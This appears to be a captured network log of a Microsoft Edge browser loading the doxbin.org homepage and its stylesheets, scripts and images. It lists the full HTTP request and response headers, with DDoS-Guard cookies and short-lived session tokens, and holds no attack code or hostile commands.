sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://doxbin.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __ddg9_=181.215.176.83
cookie: __ddgid_=BOrUF1P5N9U3NFnX
cookie: __ddgmark_=0CHaen397WYWHdAI
cookie: __ddg5_=praufnpl8jzCLK0L
cookie: __ddg2_=i01KOlwbXtN3c1Hx
cookie: __ddg8_=jWTBSlSAce72gPy9
cookie: __ddg10_=1733306921
cookie: __ddg1_=7blbsAkRyxKwVq6BSmEx

Response

HTTP/2.0 200

server: ddos-guard
date: Wed, 04 Dec 2024 10:08:42 GMT
content-length: 0
GET

https://doxbin.org/

msedge.exe

Remote address:

91.215.42.4:443

Request

GET / HTTP/2.0
host: doxbin.org
cache-control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-dest: document
referer: https://doxbin.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __ddg9_=181.215.176.83
cookie: __ddgid_=BOrUF1P5N9U3NFnX
cookie: __ddgmark_=0CHaen397WYWHdAI
cookie: __ddg5_=praufnpl8jzCLK0L
cookie: __ddg2_=i01KOlwbXtN3c1Hx
cookie: __ddg8_=jWTBSlSAce72gPy9
cookie: __ddg10_=1733306921
cookie: __ddg1_=7blbsAkRyxKwVq6BSmEx

Response

HTTP/2.0 200

server: ddos-guard
set-cookie: __ddg8_=IfXfvJ6R6QtK3K5z; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:45 GMT
set-cookie: __ddg9_=181.215.176.83; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:45 GMT
set-cookie: __ddg10_=1733306925; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:45 GMT
content-security-policy: upgrade-insecure-requests;
date: Wed, 04 Dec 2024 10:08:45 GMT
content-type: text/html; charset=UTF-8
x-powered-by: PHP/8.2.26
x-frame-options: DENY
cache-control: private, must-revalidate
pragma: no-cache
expires: -1
set-cookie: XSRF-TOKEN=eyJpdiI6IkJRbVpsck9zU2Y0M216Y0NhdytSTHc9PSIsInZhbHVlIjoiSTJSSHhBajR5WTArNjM2NmxMVkM4RFFwZnlvdEhBdk94VCtETU5IcWZ3NXlRZXBJRUlsNUdwdDdtNWU4bzAxME5laXZHQVFOR0VDY0ZQR1FSS1ByaHpLQTNrM0h5NWhhanZWWWZMZ042VWIxR0JaNU9ya0s4cSsyRjNpOThSamkiLCJtYWMiOiI3YTRhODdhM2M0ZWFkYjI2MTBiNWZjYTU1NjM5N2MzMjFmNTMzYzg4MWM0YTk1ZTk4YzVkNmRhYTFiZDVmZmRmIiwidGFnIjoiIn0%3D; expires=Wed, 04-Dec-2024 12:08:45 GMT; Max-Age=7200; path=/; domain=.doxbin.org; secure
set-cookie: doxbin_session=eyJpdiI6IlIzcG5Mb0tXOERjMmVJall3enNQb0E9PSIsInZhbHVlIjoiVmswTU1sTWtiVFJzdGUrWjNWNHFTUDZoak5QMnRyTUJDTjl2WU9tVTk5bGNsTVl1dmwyWEpDQmRMZXpmQTdna0pnVjN1aFNENUZ3WFNpKzkrYUhueEZpWnl5cy9DTnVIVGdOL3Y0UnkwWWc4ajBUdFB2OVpQS2hBTTFDc0lVbWYiLCJtYWMiOiIzNjNmYWNkNDM5Yzk5NzY5OGNkODlkYjE4MmE4M2M4M2UzODc4ZmRmYmYwZDQwNjQyOTAxNzE1NTJmNWMyYmFmIiwidGFnIjoiIn0%3D; expires=Wed, 04-Dec-2024 12:08:45 GMT; Max-Age=7200; path=/; domain=.doxbin.org; secure; httponly
x-frame-options: DENY
x-powered-by: PleskLin
content-encoding: br
GET

https://doxbin.org/legacy/index.css

msedge.exe

Remote address:

91.215.42.4:443

Request

GET /legacy/index.css HTTP/2.0
host: doxbin.org
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://doxbin.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __ddg9_=181.215.176.83
cookie: __ddgid_=BOrUF1P5N9U3NFnX
cookie: __ddgmark_=0CHaen397WYWHdAI
cookie: __ddg5_=praufnpl8jzCLK0L
cookie: __ddg2_=i01KOlwbXtN3c1Hx
cookie: __ddg1_=7blbsAkRyxKwVq6BSmEx
cookie: __ddg8_=IfXfvJ6R6QtK3K5z
cookie: __ddg10_=1733306925
cookie: XSRF-TOKEN=eyJpdiI6IkJRbVpsck9zU2Y0M216Y0NhdytSTHc9PSIsInZhbHVlIjoiSTJSSHhBajR5WTArNjM2NmxMVkM4RFFwZnlvdEhBdk94VCtETU5IcWZ3NXlRZXBJRUlsNUdwdDdtNWU4bzAxME5laXZHQVFOR0VDY0ZQR1FSS1ByaHpLQTNrM0h5NWhhanZWWWZMZ042VWIxR0JaNU9ya0s4cSsyRjNpOThSamkiLCJtYWMiOiI3YTRhODdhM2M0ZWFkYjI2MTBiNWZjYTU1NjM5N2MzMjFmNTMzYzg4MWM0YTk1ZTk4YzVkNmRhYTFiZDVmZmRmIiwidGFnIjoiIn0%3D
cookie: doxbin_session=eyJpdiI6IlIzcG5Mb0tXOERjMmVJall3enNQb0E9PSIsInZhbHVlIjoiVmswTU1sTWtiVFJzdGUrWjNWNHFTUDZoak5QMnRyTUJDTjl2WU9tVTk5bGNsTVl1dmwyWEpDQmRMZXpmQTdna0pnVjN1aFNENUZ3WFNpKzkrYUhueEZpWnl5cy9DTnVIVGdOL3Y0UnkwWWc4ajBUdFB2OVpQS2hBTTFDc0lVbWYiLCJtYWMiOiIzNjNmYWNkNDM5Yzk5NzY5OGNkODlkYjE4MmE4M2M4M2UzODc4ZmRmYmYwZDQwNjQyOTAxNzE1NTJmNWMyYmFmIiwidGFnIjoiIn0%3D

Response

HTTP/2.0 200

server: ddos-guard
set-cookie: __ddg8_=ChkuyruWwL2l9RHd; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:45 GMT
set-cookie: __ddg9_=181.215.176.83; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:45 GMT
set-cookie: __ddg10_=1733306925; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:45 GMT
content-security-policy: upgrade-insecure-requests;
date: Mon, 25 Nov 2024 11:17:50 GMT
content-type: text/css
last-modified: Wed, 01 Nov 2023 20:40:15 GMT
etag: W/"6542b7af-1f22c"
x-frame-options: DENY
x-powered-by: PleskLin
content-encoding: br
age: 773456
content-length: 18855
ddg-cache-status: HIT
GET

https://doxbin.org/legacy/css/main.css?r=44

msedge.exe

Remote address:

91.215.42.4:443

Request

GET /legacy/css/main.css?r=44 HTTP/2.0
host: doxbin.org
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://doxbin.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __ddg9_=181.215.176.83
cookie: __ddgid_=BOrUF1P5N9U3NFnX
cookie: __ddgmark_=0CHaen397WYWHdAI
cookie: __ddg5_=praufnpl8jzCLK0L
cookie: __ddg2_=i01KOlwbXtN3c1Hx
cookie: __ddg1_=7blbsAkRyxKwVq6BSmEx
cookie: __ddg8_=IfXfvJ6R6QtK3K5z
cookie: __ddg10_=1733306925
cookie: XSRF-TOKEN=eyJpdiI6IkJRbVpsck9zU2Y0M216Y0NhdytSTHc9PSIsInZhbHVlIjoiSTJSSHhBajR5WTArNjM2NmxMVkM4RFFwZnlvdEhBdk94VCtETU5IcWZ3NXlRZXBJRUlsNUdwdDdtNWU4bzAxME5laXZHQVFOR0VDY0ZQR1FSS1ByaHpLQTNrM0h5NWhhanZWWWZMZ042VWIxR0JaNU9ya0s4cSsyRjNpOThSamkiLCJtYWMiOiI3YTRhODdhM2M0ZWFkYjI2MTBiNWZjYTU1NjM5N2MzMjFmNTMzYzg4MWM0YTk1ZTk4YzVkNmRhYTFiZDVmZmRmIiwidGFnIjoiIn0%3D
cookie: doxbin_session=eyJpdiI6IlIzcG5Mb0tXOERjMmVJall3enNQb0E9PSIsInZhbHVlIjoiVmswTU1sTWtiVFJzdGUrWjNWNHFTUDZoak5QMnRyTUJDTjl2WU9tVTk5bGNsTVl1dmwyWEpDQmRMZXpmQTdna0pnVjN1aFNENUZ3WFNpKzkrYUhueEZpWnl5cy9DTnVIVGdOL3Y0UnkwWWc4ajBUdFB2OVpQS2hBTTFDc0lVbWYiLCJtYWMiOiIzNjNmYWNkNDM5Yzk5NzY5OGNkODlkYjE4MmE4M2M4M2UzODc4ZmRmYmYwZDQwNjQyOTAxNzE1NTJmNWMyYmFmIiwidGFnIjoiIn0%3D

Response

HTTP/2.0 200

server: ddos-guard
set-cookie: __ddg8_=DCeEElvuwBEy8ZWc; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:45 GMT
set-cookie: __ddg9_=181.215.176.83; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:45 GMT
set-cookie: __ddg10_=1733306925; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:45 GMT
content-security-policy: upgrade-insecure-requests;
date: Thu, 28 Nov 2024 01:13:20 GMT
content-type: text/css
last-modified: Wed, 01 Nov 2023 20:40:15 GMT
etag: W/"6542b7af-bb7"
x-frame-options: DENY
x-powered-by: PleskLin
content-encoding: br
age: 550525
content-length: 786
ddg-cache-status: HIT
GET

https://doxbin.org/legacy/dropdown.css

msedge.exe

Remote address:

91.215.42.4:443

Request

GET /legacy/dropdown.css HTTP/2.0
host: doxbin.org
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://doxbin.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __ddg9_=181.215.176.83
cookie: __ddgid_=BOrUF1P5N9U3NFnX
cookie: __ddgmark_=0CHaen397WYWHdAI
cookie: __ddg5_=praufnpl8jzCLK0L
cookie: __ddg2_=i01KOlwbXtN3c1Hx
cookie: __ddg1_=7blbsAkRyxKwVq6BSmEx
cookie: XSRF-TOKEN=eyJpdiI6IkJRbVpsck9zU2Y0M216Y0NhdytSTHc9PSIsInZhbHVlIjoiSTJSSHhBajR5WTArNjM2NmxMVkM4RFFwZnlvdEhBdk94VCtETU5IcWZ3NXlRZXBJRUlsNUdwdDdtNWU4bzAxME5laXZHQVFOR0VDY0ZQR1FSS1ByaHpLQTNrM0h5NWhhanZWWWZMZ042VWIxR0JaNU9ya0s4cSsyRjNpOThSamkiLCJtYWMiOiI3YTRhODdhM2M0ZWFkYjI2MTBiNWZjYTU1NjM5N2MzMjFmNTMzYzg4MWM0YTk1ZTk4YzVkNmRhYTFiZDVmZmRmIiwidGFnIjoiIn0%3D
cookie: doxbin_session=eyJpdiI6IlIzcG5Mb0tXOERjMmVJall3enNQb0E9PSIsInZhbHVlIjoiVmswTU1sTWtiVFJzdGUrWjNWNHFTUDZoak5QMnRyTUJDTjl2WU9tVTk5bGNsTVl1dmwyWEpDQmRMZXpmQTdna0pnVjN1aFNENUZ3WFNpKzkrYUhueEZpWnl5cy9DTnVIVGdOL3Y0UnkwWWc4ajBUdFB2OVpQS2hBTTFDc0lVbWYiLCJtYWMiOiIzNjNmYWNkNDM5Yzk5NzY5OGNkODlkYjE4MmE4M2M4M2UzODc4ZmRmYmYwZDQwNjQyOTAxNzE1NTJmNWMyYmFmIiwidGFnIjoiIn0%3D
cookie: __ddg10_=1733306925
cookie: __ddg8_=DCeEElvuwBEy8ZWc

Response

HTTP/2.0 200

server: ddos-guard
set-cookie: __ddg8_=S4Fc0bYPrW8BW3V3; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:45 GMT
set-cookie: __ddg9_=181.215.176.83; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:45 GMT
set-cookie: __ddg10_=1733306925; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:45 GMT
content-security-policy: upgrade-insecure-requests;
date: Thu, 28 Nov 2024 01:13:20 GMT
content-type: text/css
x-accel-version: 0.01
last-modified: Wed, 01 Nov 2023 20:40:15 GMT
etag: W/"32a-6091d474a09c0"
x-frame-options: DENY
x-powered-by: PleskLin
content-encoding: br
age: 550525
content-length: 279
ddg-cache-status: HIT
GET

https://doxbin.org/files/doxbin.css?r=5

msedge.exe

Remote address:

91.215.42.4:443

Request

GET /files/doxbin.css?r=5 HTTP/2.0
host: doxbin.org
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://doxbin.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __ddg9_=181.215.176.83
cookie: __ddgid_=BOrUF1P5N9U3NFnX
cookie: __ddgmark_=0CHaen397WYWHdAI
cookie: __ddg5_=praufnpl8jzCLK0L
cookie: __ddg2_=i01KOlwbXtN3c1Hx
cookie: __ddg1_=7blbsAkRyxKwVq6BSmEx
cookie: XSRF-TOKEN=eyJpdiI6IkJRbVpsck9zU2Y0M216Y0NhdytSTHc9PSIsInZhbHVlIjoiSTJSSHhBajR5WTArNjM2NmxMVkM4RFFwZnlvdEhBdk94VCtETU5IcWZ3NXlRZXBJRUlsNUdwdDdtNWU4bzAxME5laXZHQVFOR0VDY0ZQR1FSS1ByaHpLQTNrM0h5NWhhanZWWWZMZ042VWIxR0JaNU9ya0s4cSsyRjNpOThSamkiLCJtYWMiOiI3YTRhODdhM2M0ZWFkYjI2MTBiNWZjYTU1NjM5N2MzMjFmNTMzYzg4MWM0YTk1ZTk4YzVkNmRhYTFiZDVmZmRmIiwidGFnIjoiIn0%3D
cookie: doxbin_session=eyJpdiI6IlIzcG5Mb0tXOERjMmVJall3enNQb0E9PSIsInZhbHVlIjoiVmswTU1sTWtiVFJzdGUrWjNWNHFTUDZoak5QMnRyTUJDTjl2WU9tVTk5bGNsTVl1dmwyWEpDQmRMZXpmQTdna0pnVjN1aFNENUZ3WFNpKzkrYUhueEZpWnl5cy9DTnVIVGdOL3Y0UnkwWWc4ajBUdFB2OVpQS2hBTTFDc0lVbWYiLCJtYWMiOiIzNjNmYWNkNDM5Yzk5NzY5OGNkODlkYjE4MmE4M2M4M2UzODc4ZmRmYmYwZDQwNjQyOTAxNzE1NTJmNWMyYmFmIiwidGFnIjoiIn0%3D
cookie: __ddg10_=1733306925
cookie: __ddg8_=DCeEElvuwBEy8ZWc

Response

HTTP/2.0 200

server: ddos-guard
set-cookie: __ddg8_=637bu9DNWlC0PjiU; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:45 GMT
set-cookie: __ddg9_=181.215.176.83; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:45 GMT
set-cookie: __ddg10_=1733306925; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:45 GMT
content-security-policy: upgrade-insecure-requests;
date: Thu, 28 Nov 2024 08:13:53 GMT
content-type: text/css
last-modified: Fri, 08 Dec 2023 06:06:08 GMT
etag: W/"6572b250-b61"
x-frame-options: DENY
x-powered-by: PleskLin
content-encoding: br
age: 525292
content-length: 742
ddg-cache-status: HIT
GET

https://doxbin.org/legacy/jquery.min.js

msedge.exe

Remote address:

91.215.42.4:443

Request

GET /legacy/jquery.min.js HTTP/2.0
host: doxbin.org
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://doxbin.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __ddg9_=181.215.176.83
cookie: __ddgid_=BOrUF1P5N9U3NFnX
cookie: __ddgmark_=0CHaen397WYWHdAI
cookie: __ddg5_=praufnpl8jzCLK0L
cookie: __ddg2_=i01KOlwbXtN3c1Hx
cookie: __ddg1_=7blbsAkRyxKwVq6BSmEx
cookie: XSRF-TOKEN=eyJpdiI6IkJRbVpsck9zU2Y0M216Y0NhdytSTHc9PSIsInZhbHVlIjoiSTJSSHhBajR5WTArNjM2NmxMVkM4RFFwZnlvdEhBdk94VCtETU5IcWZ3NXlRZXBJRUlsNUdwdDdtNWU4bzAxME5laXZHQVFOR0VDY0ZQR1FSS1ByaHpLQTNrM0h5NWhhanZWWWZMZ042VWIxR0JaNU9ya0s4cSsyRjNpOThSamkiLCJtYWMiOiI3YTRhODdhM2M0ZWFkYjI2MTBiNWZjYTU1NjM5N2MzMjFmNTMzYzg4MWM0YTk1ZTk4YzVkNmRhYTFiZDVmZmRmIiwidGFnIjoiIn0%3D
cookie: doxbin_session=eyJpdiI6IlIzcG5Mb0tXOERjMmVJall3enNQb0E9PSIsInZhbHVlIjoiVmswTU1sTWtiVFJzdGUrWjNWNHFTUDZoak5QMnRyTUJDTjl2WU9tVTk5bGNsTVl1dmwyWEpDQmRMZXpmQTdna0pnVjN1aFNENUZ3WFNpKzkrYUhueEZpWnl5cy9DTnVIVGdOL3Y0UnkwWWc4ajBUdFB2OVpQS2hBTTFDc0lVbWYiLCJtYWMiOiIzNjNmYWNkNDM5Yzk5NzY5OGNkODlkYjE4MmE4M2M4M2UzODc4ZmRmYmYwZDQwNjQyOTAxNzE1NTJmNWMyYmFmIiwidGFnIjoiIn0%3D
cookie: __ddg10_=1733306925
cookie: __ddg8_=S4Fc0bYPrW8BW3V3

Response

HTTP/2.0 200

server: ddos-guard
set-cookie: __ddg8_=VKLC6NTpp1NgE3fo; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:46 GMT
set-cookie: __ddg9_=181.215.176.83; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:46 GMT
set-cookie: __ddg10_=1733306926; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:46 GMT
content-security-policy: upgrade-insecure-requests;
date: Thu, 28 Nov 2024 04:12:08 GMT
content-type: application/javascript
last-modified: Wed, 01 Nov 2023 20:40:15 GMT
etag: W/"6542b7af-16bb2"
x-frame-options: DENY
x-powered-by: PleskLin
content-encoding: br
age: 539798
content-length: 31736
ddg-cache-status: HIT
GET

https://doxbin.org/legacy/logout.js

msedge.exe

Remote address:

91.215.42.4:443

Request

GET /legacy/logout.js HTTP/2.0
host: doxbin.org
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://doxbin.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __ddg9_=181.215.176.83
cookie: __ddgid_=BOrUF1P5N9U3NFnX
cookie: __ddgmark_=0CHaen397WYWHdAI
cookie: __ddg5_=praufnpl8jzCLK0L
cookie: __ddg2_=i01KOlwbXtN3c1Hx
cookie: __ddg1_=7blbsAkRyxKwVq6BSmEx
cookie: XSRF-TOKEN=eyJpdiI6IkJRbVpsck9zU2Y0M216Y0NhdytSTHc9PSIsInZhbHVlIjoiSTJSSHhBajR5WTArNjM2NmxMVkM4RFFwZnlvdEhBdk94VCtETU5IcWZ3NXlRZXBJRUlsNUdwdDdtNWU4bzAxME5laXZHQVFOR0VDY0ZQR1FSS1ByaHpLQTNrM0h5NWhhanZWWWZMZ042VWIxR0JaNU9ya0s4cSsyRjNpOThSamkiLCJtYWMiOiI3YTRhODdhM2M0ZWFkYjI2MTBiNWZjYTU1NjM5N2MzMjFmNTMzYzg4MWM0YTk1ZTk4YzVkNmRhYTFiZDVmZmRmIiwidGFnIjoiIn0%3D
cookie: doxbin_session=eyJpdiI6IlIzcG5Mb0tXOERjMmVJall3enNQb0E9PSIsInZhbHVlIjoiVmswTU1sTWtiVFJzdGUrWjNWNHFTUDZoak5QMnRyTUJDTjl2WU9tVTk5bGNsTVl1dmwyWEpDQmRMZXpmQTdna0pnVjN1aFNENUZ3WFNpKzkrYUhueEZpWnl5cy9DTnVIVGdOL3Y0UnkwWWc4ajBUdFB2OVpQS2hBTTFDc0lVbWYiLCJtYWMiOiIzNjNmYWNkNDM5Yzk5NzY5OGNkODlkYjE4MmE4M2M4M2UzODc4ZmRmYmYwZDQwNjQyOTAxNzE1NTJmNWMyYmFmIiwidGFnIjoiIn0%3D
cookie: __ddg10_=1733306925
cookie: __ddg8_=637bu9DNWlC0PjiU

Response

HTTP/2.0 200

server: ddos-guard
set-cookie: __ddg8_=mXCoSca9dCfu0w2j; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:46 GMT
set-cookie: __ddg9_=181.215.176.83; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:46 GMT
set-cookie: __ddg10_=1733306926; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:46 GMT
content-security-policy: upgrade-insecure-requests;
date: Thu, 28 Nov 2024 04:12:08 GMT
content-type: application/javascript
x-accel-version: 0.01
last-modified: Wed, 01 Nov 2023 20:40:15 GMT
etag: W/"182-6091d474a09c0"
x-frame-options: DENY
x-powered-by: PleskLin
content-encoding: br
age: 539798
content-length: 169
ddg-cache-status: HIT
GET

https://doxbin.org/files/snowflakes.js

msedge.exe

Remote address:

91.215.42.4:443

Request

GET /files/snowflakes.js HTTP/2.0
host: doxbin.org
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://doxbin.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __ddg9_=181.215.176.83
cookie: __ddgid_=BOrUF1P5N9U3NFnX
cookie: __ddgmark_=0CHaen397WYWHdAI
cookie: __ddg5_=praufnpl8jzCLK0L
cookie: __ddg2_=i01KOlwbXtN3c1Hx
cookie: __ddg1_=7blbsAkRyxKwVq6BSmEx
cookie: XSRF-TOKEN=eyJpdiI6IkJRbVpsck9zU2Y0M216Y0NhdytSTHc9PSIsInZhbHVlIjoiSTJSSHhBajR5WTArNjM2NmxMVkM4RFFwZnlvdEhBdk94VCtETU5IcWZ3NXlRZXBJRUlsNUdwdDdtNWU4bzAxME5laXZHQVFOR0VDY0ZQR1FSS1ByaHpLQTNrM0h5NWhhanZWWWZMZ042VWIxR0JaNU9ya0s4cSsyRjNpOThSamkiLCJtYWMiOiI3YTRhODdhM2M0ZWFkYjI2MTBiNWZjYTU1NjM5N2MzMjFmNTMzYzg4MWM0YTk1ZTk4YzVkNmRhYTFiZDVmZmRmIiwidGFnIjoiIn0%3D
cookie: doxbin_session=eyJpdiI6IlIzcG5Mb0tXOERjMmVJall3enNQb0E9PSIsInZhbHVlIjoiVmswTU1sTWtiVFJzdGUrWjNWNHFTUDZoak5QMnRyTUJDTjl2WU9tVTk5bGNsTVl1dmwyWEpDQmRMZXpmQTdna0pnVjN1aFNENUZ3WFNpKzkrYUhueEZpWnl5cy9DTnVIVGdOL3Y0UnkwWWc4ajBUdFB2OVpQS2hBTTFDc0lVbWYiLCJtYWMiOiIzNjNmYWNkNDM5Yzk5NzY5OGNkODlkYjE4MmE4M2M4M2UzODc4ZmRmYmYwZDQwNjQyOTAxNzE1NTJmNWMyYmFmIiwidGFnIjoiIn0%3D
cookie: __ddg10_=1733306925
cookie: __ddg8_=637bu9DNWlC0PjiU

Response

HTTP/2.0 200

server: ddos-guard
set-cookie: __ddg8_=agDM6MzjZTSQJrqz; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:46 GMT
set-cookie: __ddg9_=181.215.176.83; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:46 GMT
set-cookie: __ddg10_=1733306926; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:46 GMT
content-security-policy: upgrade-insecure-requests;
date: Fri, 29 Nov 2024 07:17:02 GMT
content-type: application/javascript
last-modified: Wed, 01 Nov 2023 20:40:15 GMT
etag: W/"6542b7af-4c6e"
x-frame-options: DENY
x-powered-by: PleskLin
content-encoding: br
age: 442304
content-length: 5615
ddg-cache-status: HIT
GET

https://doxbin.org/files/cdox.png

msedge.exe

Remote address:

91.215.42.4:443

Request

GET /files/cdox.png HTTP/2.0
host: doxbin.org
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://doxbin.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __ddg9_=181.215.176.83
cookie: __ddgid_=BOrUF1P5N9U3NFnX
cookie: __ddgmark_=0CHaen397WYWHdAI
cookie: __ddg5_=praufnpl8jzCLK0L
cookie: __ddg2_=i01KOlwbXtN3c1Hx
cookie: __ddg1_=7blbsAkRyxKwVq6BSmEx
cookie: XSRF-TOKEN=eyJpdiI6IkJRbVpsck9zU2Y0M216Y0NhdytSTHc9PSIsInZhbHVlIjoiSTJSSHhBajR5WTArNjM2NmxMVkM4RFFwZnlvdEhBdk94VCtETU5IcWZ3NXlRZXBJRUlsNUdwdDdtNWU4bzAxME5laXZHQVFOR0VDY0ZQR1FSS1ByaHpLQTNrM0h5NWhhanZWWWZMZ042VWIxR0JaNU9ya0s4cSsyRjNpOThSamkiLCJtYWMiOiI3YTRhODdhM2M0ZWFkYjI2MTBiNWZjYTU1NjM5N2MzMjFmNTMzYzg4MWM0YTk1ZTk4YzVkNmRhYTFiZDVmZmRmIiwidGFnIjoiIn0%3D
cookie: doxbin_session=eyJpdiI6IlIzcG5Mb0tXOERjMmVJall3enNQb0E9PSIsInZhbHVlIjoiVmswTU1sTWtiVFJzdGUrWjNWNHFTUDZoak5QMnRyTUJDTjl2WU9tVTk5bGNsTVl1dmwyWEpDQmRMZXpmQTdna0pnVjN1aFNENUZ3WFNpKzkrYUhueEZpWnl5cy9DTnVIVGdOL3Y0UnkwWWc4ajBUdFB2OVpQS2hBTTFDc0lVbWYiLCJtYWMiOiIzNjNmYWNkNDM5Yzk5NzY5OGNkODlkYjE4MmE4M2M4M2UzODc4ZmRmYmYwZDQwNjQyOTAxNzE1NTJmNWMyYmFmIiwidGFnIjoiIn0%3D
cookie: __ddg10_=1733306926
cookie: __ddg8_=mXCoSca9dCfu0w2j

Response

HTTP/2.0 200

server: ddos-guard
set-cookie: __ddg8_=OyiwQ0da0xBefyJy; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:46 GMT
set-cookie: __ddg9_=181.215.176.83; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:46 GMT
set-cookie: __ddg10_=1733306926; Domain=.doxbin.org; Path=/; Expires=Wed, 04-Dec-2024 10:28:46 GMT
